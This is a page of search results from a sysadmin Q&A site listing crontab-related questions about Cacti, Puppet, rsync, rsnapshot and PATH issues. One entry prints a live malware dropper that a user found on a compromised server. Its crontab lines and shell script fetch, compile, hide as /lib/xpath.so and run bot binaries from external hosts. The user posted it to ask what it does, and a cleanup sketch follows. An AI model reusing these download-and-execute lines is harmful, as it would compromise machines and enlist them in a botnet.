Search Results

Search found 297 results on 12 pages for 'crontab'.

Page 11/12 | < Previous Page | 7 8 9 10 11 12  | Next Page >

  • Blank Cacti Graphs

    - by tortib
    I'm running Ubuntu 14.04 LTS and I'm having an issue with Cacti 0.8.8b not displaying any data in graphs. The graphs are being created and I see files in /var/lib/cacti/rra. My crontab entry for root is the following:
      */1 * * * * sudo -u www-data php -q /usr/share/cacti/site/poller.php > /dev/null
    The output of ls -la /var/lib/cacti/rra is the following:
      # ls -la /var/lib/cacti/rra/
      total 1008
      drwxrwx--- 2 www-data www-data  4096 Aug 20 19:27 .
      drwxr-xr-x 3 www-data www-data  4096 Aug 17 01:41 ..
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:23 tortib_com_cpu_nice_34.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:24 tortib_com_cpu_system_35.rrd
      -rw-rw-r-- 1 www-data www-data 47992 Aug 20 19:25 tortib_com_cpu_user_36.rrd
      -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:27 tortib_com_hdd_used_43.rrd
      -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:23 tortib_com_hdd_used_44.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:27 tortib_com_load_15min_38.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:26 tortib_com_load_1min_37.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:23 tortib_com_load_5min_39.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:24 tortib_com_mem_buffers_40.rrd
      -rw-rw-r-- 1 www-data www-data 47992 Aug 20 19:25 tortib_com_mem_cache_41.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:26 tortib_com_mem_free_42.rrd
      -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:24 tortib_com_traffic_in_45.rrd
      -rw-rw-r-- 1 www-data www-data 94816 Aug 20 19:25 tortib_com_traffic_in_46.rrd
      -rw-r--r-- 1 www-data www-data 94816 Aug 20 19:26 tortib_com_traffic_in_47.rrd
      -rw-r--r-- 1 www-data www-data 47992 Aug 20 19:27 tortib_com_users_48.rrd
    I tried to run the poller as root from the command line, but it doesn't output anything useful, nor does it graph any data. The device in Cacti shows that it's able to query SNMP and that ping is alive, yet the graphs are still empty. snmpwalk 127.0.0.1 -v2c -c public works as it should and walks all MIBs. I'm quite perplexed as to why this isn't working any longer: it was graphing data (intermittently) and then it just stopped. Thank you for reading this problem and helping.
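
    One way to narrow this down (a sketch, not Cacti's official procedure; the log path and data-source file name below are assumptions to adapt to this install): run the poller by hand as the same user cron uses, with debug output, and then check whether the RRD files are actually receiving updates.
      # run the poller manually as the cron user, with debug output
      sudo -u www-data php -q /usr/share/cacti/site/poller.php --force --debug
      # check whether an RRD is being updated at all
      rrdtool last /var/lib/cacti/rra/tortib_com_load_1min_37.rrd
      rrdtool fetch /var/lib/cacti/rra/tortib_com_load_1min_37.rrd AVERAGE | tail -20
      # and check the Cacti poller log for errors (path may differ; see Settings -> Paths in the UI)
      tail -50 /var/log/cacti/cacti.log
    If rrdtool last shows a recent timestamp, the data is arriving and the problem is on the graph-rendering side; if not, the poller or SNMP data sources are the place to dig.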

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab:
      [...]
      * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
      @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
      [...]
    The contents of http://stablehost.us/bots/regular.bot are:
      #!/bin/sh
      if [ $(whoami) = "root" ]; then
      echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
      echo y|apt-get install libwww-perl
      apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
      pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
      wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
      wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
      wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
      exit 1
      fi
      wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
      wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
      wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_
    I cannot contact the sysadmin for various reasons, so I cannot ask him about this. It looks to me as if the script downloads some remote C source code and binaries, compiles them, and executes them. I am a web developer, not a C expert, but from the downloaded files this appears to be a bot injected into the server's cron. Can you give me more information about what this code does, how it works, and what its purpose is?
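
    For immediate containment (a rough sketch, not a full incident-response procedure; the paths come from the crontab above, and the quarantine location is an arbitrary choice), the usual first steps are to remove the cron entries, stop the running process, and preserve the dropped files for analysis rather than executing them:
      crontab -l > /root/infected-crontab.txt                 # keep a copy as evidence
      crontab -l | grep -v '/dev/shm/tmp/.rnd' | crontab -    # drop the two malicious entries
      pkill -f '/dev/shm/tmp/.rnd' 2>/dev/null                # stop the bot if it is running
      mkdir -p /root/quarantine
      mv /dev/shm/tmp/.rnd /lib/xpath.so* /root/quarantine/ 2>/dev/null
      chmod 000 /root/quarantine/*                            # make sure nothing gets re-executed
    Since the account (and possibly the whole box) is compromised, treat this only as a stopgap until the machine can be rebuilt from a known-good image and its credentials rotated.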

    Read the article

  • Ubuntu virtual memory caches suck up memory

    - by Tom
    Hey all, I've got an Ubuntu 9.10 64-bit server that seems to use up all available memory. According to my munin graphs, almost all of the memory used up is in the swap cache, cache, and slab cache. (I take this to mean virtual memory caches, am I right in assuming this?) Once memory usage approaches 100%, some (although not all) system services such as SSH become sluggish and unresponsive. After rebooting the system, performance and memory usage become normal for a time. Some interesting tidbits: The system runs Apache 2, MySQL, Munin, and sshd. The memory usage spikes happen at the same time every night (at 10 PM sharp.) There appears to be nothing in the crontab for any of the users, and nothing in /etc/cron.d/* out of the ordinary, let alone something that would occur at 10 PM. My question is, how do I figure out what is causing the memory suckage? I've tried the usual utilities (e.g. ps, top, etc) but I can't seem to find anything unusual. Any ideas? Thanks in advance!
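
    A few standard commands help separate reclaimable cache from real memory pressure and catch whatever fires around 22:00 (a sketch; nothing here is specific to this server, and the crontab check needs root):
      free -m                        # the "-/+ buffers/cache" row shows memory actually in use
      slabtop -o | head -20          # largest slab caches (dentry/inode caches are common culprits)
      egrep 'Slab|Cached|SwapCached' /proc/meminfo
      # check every user's crontab, not just root's, for something scheduled near 22:00
      for u in $(cut -d: -f1 /etc/passwd); do echo "== $u"; crontab -l -u "$u" 2>/dev/null; done
      grep CRON /var/log/syslog | grep ' 22:0'
    Cache that the kernel can reclaim is generally harmless; the sluggish SSH at 100% usage is the part worth correlating with swap activity (vmstat 5) at that hour.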

    Read the article

  • Setting Ubuntu Global PATH for Ruby Enterprise Edition

    - by Wally Glutton
    Context: I recently installed Ruby Enterprise Edition (REE) on an Ubuntu 8.04 server. I would like for this new version of Ruby to globally supersede (for all users, crontabs, etc.) the older version in /usr/local/bin.
    Attempted Solution #1: The REE documentation recommends placing the REE bin folder at the beginning of the global PATH in /etc/environment. I altered the PATH line in this file to read:
      PATH="/opt/ruby_ee/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
    This did not affect my PATH at all.
    Attempted Solution #2: Next I followed these instructions and updated the PATH setting in the /etc/login.defs and /etc/crontab files. (I did not change /etc/sudoers.) This didn't affect my PATH either, even after logging out and rebooting the server.
    Other information: I seem to be having the same problem described here. I'm testing using the command echo $PATH. My shell is bash, and my .bashrc doesn't alter my PATH. I'm ssh'ed into the system for all testing. /opt/ruby_ee/ is a symlink to /opt/ruby-enterprise-1.8.7-2011.03/.
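
    One approach that usually covers both login shells and cron (a sketch, assuming the REE binaries really do live in /opt/ruby_ee/bin) is a profile.d snippet for interactive users plus an explicit PATH at the top of /etc/crontab, since cron's PATH is set there or per-crontab rather than by shell startup files:
      # /etc/profile.d/ree.sh  (picked up by login shells)
      export PATH=/opt/ruby_ee/bin:$PATH

      # at the top of /etc/crontab and any user crontab that needs it
      PATH=/opt/ruby_ee/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    After adding the profile.d file, test from a brand-new ssh login; an existing session keeps its old environment, which can make a correct change look like it "did nothing".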

    Read the article

  • Puppet Agent fails sporadically, with either timeout or "Could not find class" error

    - by smokris
    I have puppet master running on a Xen dom0, and 3 domUs syncing to it via an hourly crontab puppet agent --test. About 80% of the time, the puppet agent --test completes successfully:
      info: Retrieving plugin
      info: Caching catalog for test3
      info: Applying configuration version '1333319732'
      notice: Finished catalog run in 5.08 seconds
    The other 20% of the time, it fails midway, with errors such as the following:
      err: Could not retrieve catalog from remote server: Error 400 on SERVER: Could not find class iptables for test1 at /etc/puppet/manifests/site.pp:1 on node test1
      warning: Not using cache on failed catalog
      err: Could not retrieve catalog; skipping run
    or
      info: Retrieving plugin
      info: Caching catalog for test2
      info: Applying configuration version '1333319732'
      notice: Finished catalog run in 24.73 seconds
      err: Could not send report: Error 500 on SERVER: Internal Server Error private method `gsub' called for WEBrick::HTTPStatus::RequestTimeout:Class WEBrick/1.3.1 (Ruby/1.8.5/2006-08-25) OpenSSL/0.9.8e-rhel5 at puppet:8140
    or
      info: Retrieving plugin
      err: Could not retrieve catalog from remote server: execution expired
      warning: Not using cache on failed catalog
      err: Could not retrieve catalog; skipping run
    or
      info: Retrieving plugin
      info: Caching catalog for test3
      info: Applying configuration version '1333319732'
      notice: Finished catalog run in 9.47 seconds
      err: Could not send report: Error 408 on SERVER: Request Timeout
    During this time, I've not made any changes to the Puppet configuration — it just sporadically fails. I'm running puppet-2.7.12 on CentOS, and followed the setup instructions described on http://docs.puppetlabs.com/learning/agent_master_basic.html. Any ideas about how I can troubleshoot this?
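
    The WEBrick errors and "execution expired" point at the single-threaded built-in server being hit by several agents at once. Two things commonly tried (a sketch under that assumption, not a verified fix for this setup): raise the agent-side timeout, and stagger the cron runs so the three domUs don't all connect in the same minute:
      # /etc/puppet/puppet.conf on each agent (puppet 2.7)
      [agent]
      configtimeout = 300

      # crontab: offset each domU instead of running all of them at :00
      7  * * * * /usr/bin/puppet agent --test >/dev/null 2>&1   # test1
      27 * * * * /usr/bin/puppet agent --test >/dev/null 2>&1   # test2
      47 * * * * /usr/bin/puppet agent --test >/dev/null 2>&1   # test3
    Longer term, moving the master off WEBrick onto Apache/Passenger is the usual answer once there is more than a handful of nodes.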

    Read the article

  • ghettoVCB issue

    - by romgo75
    I have set up a ghettoVCB script in order to back up three VMs. I put it in a crontab but I have an issue. In my backup folder I have 3 different folders, one for each VM. In each folder I have the following files:
      -rw-r--r-- 1 root root 1263 Mar 17 01:51 vm1-2010-03-16--2.gz
      -rw-r--r-- 1 root root 1263 Mar 17 00:41 vm1-2010-03-16--3.gz
      -rw-r--r-- 1 root root 1261 Mar 18 01:22 vm1-2010-03-17--1.gz
      drwxr-xr-x 1 root root  980 Mar 19 23:39 vm1-2010-03-19
    The problem is the last folder. It seems that a backup didn't finish the process. When I read the logs concerning this folder I get:
      2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_VOLUME = /vmfs/volumes/datastore1/backup/
      2010-03-19 23:00:01 -- info: CONFIG - VM_BACKUP_ROTATION_COUNT = 3
      2010-03-19 23:00:01 -- info: CONFIG - DISK_BACKUP_FORMAT = zeroedthick
      2010-03-19 23:00:01 -- info: CONFIG - ADAPTER_FORMAT = buslogic
      2010-03-19 23:00:01 -- info: CONFIG - POWER_VM_DOWN_BEFORE_BACKUP = 0
      2010-03-19 23:00:01 -- info: CONFIG - ENABLE_HARD_POWER_OFF = 0
      2010-03-19 23:00:01 -- info: CONFIG - ITER_TO_WAIT_SHUTDOWN = 3
      2010-03-19 23:00:01 -- info: CONFIG - POWER_DOWN_TIMEOUT = 5
      2010-03-19 23:00:01 -- info: CONFIG - SNAPSHOT_TIMEOUT = 15
      2010-03-19 23:00:01 -- info: CONFIG - LOG_LEVEL = info
      2010-03-19 23:00:01 -- info: CONFIG - BACKUP_LOG_OUTPUT = stdout
      2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_MEMORY = 0
      2010-03-19 23:00:01 -- info: CONFIG - VM_SNAPSHOT_QUIESCE = 0
      2010-03-19 23:00:01 -- info: CONFIG - VMDK_FILES_TO_BACKUP = all
      http://...
      2010-03-19 23:39:35 -- info: Initiate backup for vm1
      2010-03-19 23:39:35 -- info: Creating Snapshot "ghettoVCB-snapshot-2010-03-19" for vm1
      Destination disk format: VMFS zeroedthick
      Cloning disk '/vmfs/volumes/datastore1/vm1/vm1_1.vmdk'...
      ^MClone: 0% done.^MClone: 1% done.^MClone: 2% done.^MClone: 3% done.^MClone: 4% done.^MClone: 5% done.^MClone: 6% done.^MClone: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone Failed to clone disk : The file already exists (39).
      Destination disk format: VMFS zeroedthick
      Cloning disk '/vmfs/volumes/datastore1/vm1/vm1.vmdk'...
      2010-03-20 00:46:20 -- info: Removing snapshot from vm1 ...
      one: 7% done.^MClone: 8% done.^MClone: 9% done.^MClone: 10% done.^MClone: 11% done.^MClone: 12% done.^MClone: 13% done.^MClone: 14% done.^MClone: 15% done.^MClone: 16% done.^MCl
      2010-03-19 23:51:19 -- info: Removing snapshot from vm1 ...
    I can't run ghettoVCB anymore because the VM has a snapshot which has not been deleted. I know how to delete the snapshot, but I don't know why the script is not able to handle rotation of the VM backups. Any ideas? Thanks!
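
    To clear the stale snapshot from the host before the next run (a sketch; the VM id below is whatever the host reports for vm1, and this assumes an ESXi-style shell):
      vim-cmd vmsvc/getallvms                  # note the Vmid for vm1
      vim-cmd vmsvc/snapshot.get <vmid>        # confirm the leftover ghettoVCB snapshot
      vim-cmd vmsvc/snapshot.removeall <vmid>  # consolidate and delete all snapshots for that VM
      # also delete the partial vm1-2010-03-19 backup directory before retrying, since the
      # "file already exists (39)" clone error suggests the aborted run left files behind
    On classic ESX with a service console, the equivalent is vmware-cmd <path-to-vmx> removesnapshots.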

    Read the article

  • rsync over ssh backup failing after relocation of server

    - by OlduvaiHand
    I've got two FreeBSD machines set up; one serves video data and the other is the backup for the first. At this point I've got around 4TB of data. I add files to the video server a few at a time, and was planning to use rsync over ssh to keep the backup machine up to date. I did the initial, large backup with both machines hooked up to the same subnet at the lab with no problems using rsync. Then, when I moved the backup machine off-site (but still on the university network), I attempted a sync without changing anything other than the IP (as the machine is now on a different subnet) and got the following error:
      2010/03/22 15:55:21 [1260] rsync: connection unexpectedly closed (6340840244 bytes received so far) [receiver]
      2010/03/22 15:55:21 [1260] rsync error: error in rsync protocol data stream (code 12) at io.c(601) [receiver=3.0.7]
      2010/03/22 15:55:21 [1258] rsync: connection unexpectedly closed (60 bytes received so far) [generator]
      2010/03/22 15:55:21 [1258] rsync error: unexplained error (code 255) at io.c(601) [generator=3.0.7]
    The script that handles the backup hasn't been changed, nor has the crontab that invokes it. Does anyone have any ideas about what might be causing the hiccup? I was under the impression that it might have something to do with the ssh connection timing out or something along those lines, but am not entirely clear on how to diagnose the cause of the problem.
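
    If the suspicion about the ssh connection idling out is right (common when traffic now crosses a firewall between subnets), keepalives are cheap to try; a sketch of the relevant invocation, with the paths, user, and host as placeholders:
      rsync -az --partial --timeout=600 \
            -e "ssh -o ServerAliveInterval=30 -o ServerAliveCountMax=10" \
            /path/to/video/ backupuser@backup-host:/path/to/video/
      # run it once with -vv from a console first so any ssh-side error message is visible
    --partial keeps interrupted large files so a retried run does not start them from zero.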

    Read the article

  • How to stop Cron from sending messages about errors

    - by Beck
    I keep getting strange mails like this from cron:
      Return-Path: <[email protected]>
      Delivered-To: [email protected]
      Received: by domain.com (Postfix, from userid 0) id 6F944264D0; Mon, 10 Jan 2011 10:35:01 +0000 (UTC)
      From: [email protected] (Cron Daemon)
      To: [email protected]
      Subject: Cron <root@domain> lynx -dump http://www.domain.com/cron/realqueue
      Content-Type: text/plain; charset=ANSI_X3.4-1968
      X-Cron-Env: <SHELL=/bin/sh>
      X-Cron-Env: <PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin>
      X-Cron-Env: <HOME=/root>
      X-Cron-Env: <LOGNAME=root>
      Message-Id: <[email protected]>
      Date: Mon, 10 Jan 2011 10:35:01 +0000 (UTC)

      /bin/sh: lynx: not found
    I have these settings in my crontab file:
      SHELL=/bin/sh
      PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
      */5 * * * * lynx -dump http://www.domain.com/cron/realqueue
      17 * * * * root cd / && run-parts --report /etc/cron.hourly
      25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
      47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
      52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    Lynx is installed on my Ubuntu box as well. Of course, in place of domain.com is my real domain, just replaced. Thanks ;)
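
    Cron only sends mail because the job produced output, so the cleanest fix is to stop the "lynx: not found" error itself and discard whatever lynx prints. A sketch (the full path is an assumption; use whatever which lynx reports on this machine), plus the blunt option of disabling mail for the whole crontab:
      MAILTO=""
      */5 * * * * /usr/bin/lynx -dump http://www.domain.com/cron/realqueue >/dev/null 2>&1
    Note that this appears to be /etc/crontab-style syntax in the run-parts lines but the lynx line has no user field; if this really is /etc/crontab, the lynx entry also needs a user column, which is another reason it fails there.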

    Read the article

  • Using AT on Ubuntu to Background Downloads (w/ Queue)

    - by Nicholas Yost
    I am writing a PHP script, but I want to use the at command in Ubuntu to fetch a remote file via wget. I'm basically looking to background the process so PHP can finish fairly quickly. I cannot find any questions on here about how to use both, but I basically want to do the following pseudo-code:
      <?php
      exec('at now -q queuename wget http://path.to/remote/file.ext');
      ?>
    Additionally, I'd like to queue this between providers. I'd like to have each path.to have its own queue, so I only download one file from each provider at a time. Meaning:
      <?php
      exec('at now -q remote wget http://path.to/remote/file.ext /local/path');
      exec('at now -q vendorone wget http://vendor.one/remote/file.ext /local/path');
      exec('at now -q vendortwo wget http://vendor.two/remote/file.ext /local/path');
      exec('at now -q vendorone wget http://vendor.one/remote/file.ext /local/path');
      ?>
    This should download the files from path.to, vendor.one and vendor.two immediately, and when the first file is finished downloading from vendor.one, it starts the second file. Does that make sense? I can't find anything like this anywhere on the web, much less on SO/SF. If we can use the crontab to run a one-off wget command, that's fine too.
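
    Two details of at are worth noting here (a sketch of the syntax only, not a full solution to per-provider serialization): queue names are single letters (a-z, A-Z), not words like "vendorone", and at reads the command from stdin rather than from its argument list, so the wget has to be echoed or piped in. The -O form is used because wget does not take a destination path as a bare second argument; queue letters and paths below are arbitrary:
      echo 'wget -q http://path.to/remote/file.ext -O /local/path/file.ext' | at -q r now
      echo 'wget -q http://vendor.one/remote/file.ext -O /local/path/file1.ext' | at -q v now
    Queues by themselves do not serialize jobs, though; everything scheduled for "now" starts as soon as atd picks it up (only the batch queue waits for low load), so running one download per provider at a time still needs something like a per-provider flock or a small worker script.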

    Read the article

  • Script launching 3 copies of rsync

    - by organicveggie
    I have a simple script that uses rsync to copy a Postgres database to a backup location for use with Point In Time Recovery. The script is run every 2 hours via a cron job for the postgres user. For some strange reason, I can see three copies of rsync running in the process list. Any ideas why this might be the case? Here's the cron entry:
      # crontab -u postgres -l
      PATH=/bin:/usr/bin:/usr/local/bin
      0 */2 * * * /var/lib/pgsql/9.0/pitr_backup.sh
    And here's the ps list, which shows two copies of rsync running and one sleeping:
      # ps ax |grep rsync
      9102 ?  R  2:06 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log
      9103 ?  S  0:00 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log
      9104 ?  R  2:51 rsync -avW /var/lib/pgsql/9.0/data/ /var/lib/pgsql/9.0/backups/pitr_archives/20110629100001/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log
    And here's the uber-simple script that seems to be the cause of the problem:
      #!/bin/sh
      LOG="/var/log/pgsql-pitr-backup.log"
      base_backup_dir="/var/lib/pgsql/9.0/backups"
      wal_archive_dir="$base_backup_dir/wal_archives"
      pitr_archive_dir="$base_backup_dir/pitr_archives"
      timestamp=`date +%Y%m%d%H%M%S`
      backup_dir="$pitr_archive_dir/$timestamp"
      mkdir -p $backup_dir
      echo `date` >> $LOG
      /usr/bin/psql -U postgres -c "SELECT pg_start_backup('$backup_dir');"
      rsync -avW /var/lib/pgsql/9.0/data/ $backup_dir/ --exclude pg_xlog --exclude recovery.conf --exclude recovery.done --exclude pg_log
      /usr/bin/psql -U postgres -c "SELECT pg_stop_backup();"
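
    This is likely normal behaviour rather than three separate invocations: for a local (disk-to-disk) copy, rsync forks into a sender, a generator, and a receiver, all sharing the same command line, so one run shows up as three processes. A quick way to see the same thing outside cron (the source path is a placeholder):
      rsync -avW /some/large/dir/ /tmp/rsync-test/ >/dev/null &
      sleep 2
      ps -o pid,ppid,stat,args -C rsync   # typically shows three related rsync processes
      wait
    The pid/ppid column makes the parent-child relationship obvious; all three exit together when the copy finishes.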

    Read the article

  • rsnapshot schedule overlapping, help with backup schedule

    - by Znarkus
    Hello, I have the following configuration.
    rsnapshot.conf:
      interval   halfhourly   4
      interval   hourly       6
      interval   twohourly    12
      interval   daily        7
      interval   weekly       4
    crontab:
      0,30 * * * * /usr/bin/rsnapshot halfhourly >> /var/log/rsnapshot.halfhourly.log 2>&1
      5 * * * * /usr/bin/rsnapshot hourly >> /var/log/rsnapshot.hourly.log 2>&1
      10 */2 * * * /usr/bin/rsnapshot twohourly >> /var/log/rsnapshot.twohourly.log 2>&1
      15 3 * * * /usr/bin/rsnapshot daily >> /var/log/rsnapshot.daily.log 2>&1
      20 6 * * MON /usr/bin/rsnapshot weekly >> /var/log/rsnapshot.weekly.log 2>&1
    Only halfhourly is running correctly now. hourly spits out this error:
      rsnapshot encountered an error! The program was invoked with these options:
      /usr/bin/rsnapshot hourly
      ----------------------------------------------------------------------------
      ERROR: Lockfile /var/run/rsnapshot.pid exists and so does its process, can not continue
    To me it seems like my 5-minute gap between halfhourly and hourly is too small. Is this configuration crazy? I like having backups every thirty minutes; that will probably save my ass some day. Please help me make a decent backup schedule that doesn't clog up the system but still creates frequent enough backups. Thank you.
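
    One common pattern (a sketch, with offsets picked arbitrarily) is to give the higher intervals more room after the half-hourly sync and to wrap every entry in flock on a shared lock so late runs queue up instead of dying on rsnapshot's own lockfile:
      0,30 * * * * flock /var/lock/rsnapshot.cron /usr/bin/rsnapshot halfhourly >> /var/log/rsnapshot.halfhourly.log 2>&1
      10   * * * * flock /var/lock/rsnapshot.cron /usr/bin/rsnapshot hourly     >> /var/log/rsnapshot.hourly.log 2>&1
      20 */2 * * * flock /var/lock/rsnapshot.cron /usr/bin/rsnapshot twohourly  >> /var/log/rsnapshot.twohourly.log 2>&1
      45 3 * * *   flock /var/lock/rsnapshot.cron /usr/bin/rsnapshot daily      >> /var/log/rsnapshot.daily.log 2>&1
      50 6 * * 1   flock /var/lock/rsnapshot.cron /usr/bin/rsnapshot weekly     >> /var/log/rsnapshot.weekly.log 2>&1
    Note that in rsnapshot only the smallest interval actually transfers data; the higher ones just rotate directories, so once they stop colliding with a long-running halfhourly sync they should finish in seconds.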

    Read the article

  • How do I prevent spawning of zombie-like apache2 processes on Dreamhost VPS?

    - by Jonathan Hayward
    I have had a website on a DreamHost VPS for months or longer, and I have vague memories of having to turn off some customized Apache under /dh during initial setup in order to work with a standard Apache 2.x. Things had been going along on an even keel until I started making some changes lately and found that when I tried to bounce Apache (/usr/sbin/apachectl restart), it couldn't bind to port 80, and my site had been converted from a big literature site to a small parking page. I tried to see what was listening on 80, and it was a DreamHost-customized Apache that had spawned. I killed all of them, restarted Apache, and changed the parent directory under /dh to mode 000. That was a day or two ago. I was bouncing Apache again while trying to get a new site to load under HTTPS, and I found that once again DreamHost's Apache had spawned, from the directory I set to mode 000, and once again converted my site to a parking page. I renamed the directory, but I am very skeptical of whether I have permanently killed the DreamHost-customized Apache. Besides duct-tape options like a crontab that kills and deletes it each minute, how can I permanently turn off the Apache processes that are spawning from a location under /dh and interfering with standard Apache? What should I be doing that I am not? Can DreamHost's technical support stop the interference? Thanks,

    Read the article

  • On AWS EC2, Unable to run sudo command after modifying permissions to /usr folder

    - by Kayote
    All, we have searched quite a bit, and a few of Eliah Kagan's posts are great about getting access back to sudo. However, our server is on AWS EC2 and I am a complete newbie to this. We are trying to set up cron jobs for backing up our server data.
    What we did: using PuTTY, we created a script file usr/share/site-db-backup/backupToS3.php; however, Ubuntu was not saving the changes we made, as it reported we did not have permission as user 'Ubuntu'. The error details are:
      Upload of file backupToS3.php was successful but error occurred while setting the permission and/or timestamp.
      If the problem persists, turn on 'ignore permission errors' option.
      Permission denied.
      Error code: 3
      Request code 9
    So we ran the command "sudo chmod -R a+rwx /usr" to grant permission to the /usr folder. However, now whatever sudo command is run, we get the error:
      /usr/lib/sudo/sudoers.so must be only be writable by owner.
      fatal error, unable to load plugins.
    We are complete newbies to Ubuntu and EC2, so we do need step-by-step guidance on how to get sudo back and successfully write to the cron script sitting in the /usr folder.
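
    Once /usr has been recursively chmod'ed, sudo can no longer be repaired from inside the instance, because nothing can elevate privileges any more. The usual EC2 recovery path is to fix the filesystem from a second instance; a rough sketch only (device name, partition, and mount point are assumptions, and far more files than these were touched):
      # 1. stop the broken instance, detach its root EBS volume,
      #    and attach it to a healthy helper instance (e.g. as /dev/xvdf)
      # 2. on the helper instance:
      sudo mkdir -p /mnt/broken
      sudo mount /dev/xvdf1 /mnt/broken
      sudo chmod 755 /mnt/broken/usr /mnt/broken/usr/bin /mnt/broken/usr/lib
      sudo chmod 4755 /mnt/broken/usr/bin/sudo            # sudo must be setuid root
      sudo chmod 644 /mnt/broken/usr/lib/sudo/sudoers.so  # the plugin must not be group/world writable
      sudo chown -R root:root /mnt/broken/usr/bin/sudo /mnt/broken/usr/lib/sudo
      sudo umount /mnt/broken
      # 3. detach the volume, reattach it to the original instance as its root device, and boot
    Because the recursive chmod loosened permissions under all of /usr, launching a fresh instance (or restoring from a snapshot) and copying the data over is often the cleaner long-term fix.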

    Read the article

  • Server Crash Diagnosis... Are there any 'black box recorder' style programs available?

    - by columbo
    My Red Hat server is crashing every three weeks or so at around 4:15 am on Sunday mornings (well, it was Sundays; the last two have been Thursday mornings, also at about 4:15). Looking at the logs (mysql, httpd, messages) there are no clues as to why; they just seem to stop. I ran a little script to take memory readings every 15 minutes, and it too stops (with normal readings) at this time. The server is remote at a provider, so I can only access it via the web. I use Plesk. It appears to be a scheduled job or something similar that is causing the issue, but I can see nothing in crontab. So my question is: has anyone else had this and can offer advice? Failing that, does anyone know of a way to get more detailed logging than that offered by the messages file? I was thinking of a black-box-style recording program, or maybe something as simple as an option somewhere to increase the level of reporting in the messages log. Thanks
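
    The usual "black box" on Red Hat style systems is sysstat, which records CPU, memory, I/O and load every few minutes via its own cron job, so the minutes leading up to a crash can be read back afterwards. A minimal sketch:
      yum install sysstat
      chkconfig sysstat on && service sysstat start     # enables the /etc/cron.d/sysstat collector
      # after the next crash, read back the samples from just before it died, e.g. 04:00-04:20:
      sar -r -s 04:00:00 -e 04:20:00 -f /var/log/sa/saXX   # memory; replace XX with the day of month
      sar -q -s 04:00:00 -e 04:20:00 -f /var/log/sa/saXX   # load average and run queue
    If the kernel itself is dying, a serial or netconsole console log is the other common option, since panic messages often never make it into /var/log/messages.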

    Read the article

  • Changing PATH Environment Variable for all Users. (Ubuntu)

    - by Wally Glutton
    I recently compiled Ruby Enterprise Edition (REE) on an Ubuntu 8.04 server. I would like to update my PATH to ensure this new version of Ruby (found in /opt/ruby_ee/bin) supersedes the older version in /usr/local/bin. (I still want the old version around, though.) I would like these PATH changes to affect all users and crontabs.
    Attempted Solution #1: The REE documentation recommends placing the REE bin folder at the beginning of the global PATH in /etc/environment. I altered the PATH in this file to read:
      PATH="/opt/ruby_ee/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
    This did not affect my PATH at all.
    Attempted Solution #2: Next I followed these instructions and updated the PATH setting in /etc/login.defs and /etc/crontab. (I did not change /etc/sudoers.) This didn't affect my PATH either, even after logging out and rebooting the server.
    Other information: I seem to be having the same problem described here. I'm testing using the commands "echo $PATH" and "ruby -v". My shell is bash. My .bashrc doesn't override my PATH. Yes, I have heard of the Ruby Version Manager project. ;)

    Read the article

  • Debian Server won't reboot from script

    - by Littlejon
    I have a script that is run to back up a server via rsync; after that script is run, I want the server to reboot. My script is run as root from the crontab at 3am in the morning.
      #!/bin/bash
      HOST="email"
      RSYNC_OPTS="-a -v -v --progress --stats --delete"
      RSYNC_DEST="10.0.0.10::$HOST"
      BACKUP_LIST="/etc /home /root"
      TIMESTAMP="/timestamp-bkup-start.chk"
      TIMESTAMP2="/timestamp-bkup-stop.chk"
      touch $TIMESTAMP
      rsync $RSYNC_OPTS $TIMESTAMP $RSYNC_DEST
      for BACKUP_ITEM in $BACKUP_LIST; do
        rsync $RSYNC_OPTS $BACKUP_ITEM $RSYNC_DEST
      done
